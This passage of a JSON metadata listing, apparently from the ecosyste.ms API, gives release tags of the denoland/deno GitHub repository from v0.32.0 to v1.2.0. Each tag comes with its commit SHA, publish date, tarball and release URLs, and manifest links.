positories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0